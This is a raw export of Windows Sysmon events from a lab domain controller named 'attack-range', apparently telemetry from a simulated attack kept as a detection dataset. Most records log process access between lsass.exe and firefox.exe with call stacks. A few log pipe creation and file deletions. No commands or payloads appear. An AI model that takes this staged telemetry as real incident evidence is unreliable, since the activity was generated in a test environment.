Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.470{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.470{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.469{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.469{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.469{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.469{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.469{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.468{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.468{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.467{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.467{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.467{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.467{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.467{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.467{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.467{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.467{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.466{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.466{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000042520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:42.464{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.4.43153772C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000042519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.368{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=675052725A58413BC35B0C5D00083619,SHA256=1990522BFB755D45A8F649D47750BAEDF2EA671DEC8C4A2448219F5521A5004F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.365{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=16EC67450498ECDCD7791A7A5FDA16C2,SHA256=F94EAF0E35BD8A1004B2F71AAC42B6D4832F9ABC4A868B5ECFCAAC43C28781E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.363{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=F7A119D1D09083FF09531E11314DF041,SHA256=316DB32A5B2DE242353D9D54101980F942163DEB33B89A89E8D71EC63AC7B7C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.361{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=0B886EC62D83D43C515B6A27E47D43A5,SHA256=20536774B34BFD2EB1FBD3C3C32CF29AA1664DC514A4A525712545FEE40E45A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.360{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=0867E32B635EC3D90B67D9CFF3B05AD5,SHA256=C684DC5F4BAAFF7C81729611083299E786AD6A94CCC341ADC75D51FB6ADD5677,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.359{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A899F3AF69DF480841DA8FC1A2EEDDA9,SHA256=D58D78615B1E26230303572BB7FD3ED121F118CB2F1E4FAFC3D83922720353D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.359{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla 